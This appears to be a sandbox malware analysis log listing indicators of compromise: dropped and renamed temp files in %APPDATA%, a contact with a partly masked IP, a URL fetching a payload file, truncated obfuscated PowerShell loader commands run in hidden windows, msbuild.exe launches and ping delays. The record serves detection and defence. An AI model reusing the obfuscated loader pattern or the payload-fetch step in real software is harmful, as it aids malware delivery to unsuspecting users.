Technical Information
- %APPDATA%\bit6853.tmp
- %APPDATA%\bit8ff0.tmp
- %APPDATA%\bit6853.tmp
- %APPDATA%\bit8ff0.tmp
- from %APPDATA%\bit6853.tmp to %APPDATA%\slrhales.amn
- from %APPDATA%\bit8ff0.tmp to %APPDATA%\slrhales.amn
- '64.##2.85.135':80
- http://64.##2.85.135/Paavirkede.thn
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Sdgrdenska;function Beluring ($Sprtni, $Registerti, $Thom) {$Sprtni.'Substring'($Registerti, $Thom);}Function Underemp9 ([String]$Comm){For($Rorsbusgad=5; $Rorsbusgad -lt $Comm.Length-$Voltig...' (with hidden window)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe' ' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Sdgrdenska;function Beluring ($Sprtni, $Registerti, $Thom) {$Sprtni.'Substring'($Registerti, $Thom);}Function Underemp9 ([String]$Comm){For($Rorsbusgad=5; $Rorsbusgad -lt $Comm.Length-$Voltig...
- '<SYSTEM32>\cmd.exe' /c "ping localhost"
- '<SYSTEM32>\ping.exe' localhost
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "$Sdgrdenska;function Beluring ($Sprtni, $Registerti, $Thom) {$Sprtni.'Substring'($Registerti, $Thom);}Function Underemp9 ([String]$Comm){For($Rorsbusgad=5; $Rorsbusgad -lt $Comm.Length-$Voltig...
- '%WINDIR%\syswow64\cmd.exe' /c "ping localhost"
- '%WINDIR%\syswow64\ping.exe' localhost
- '%WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe'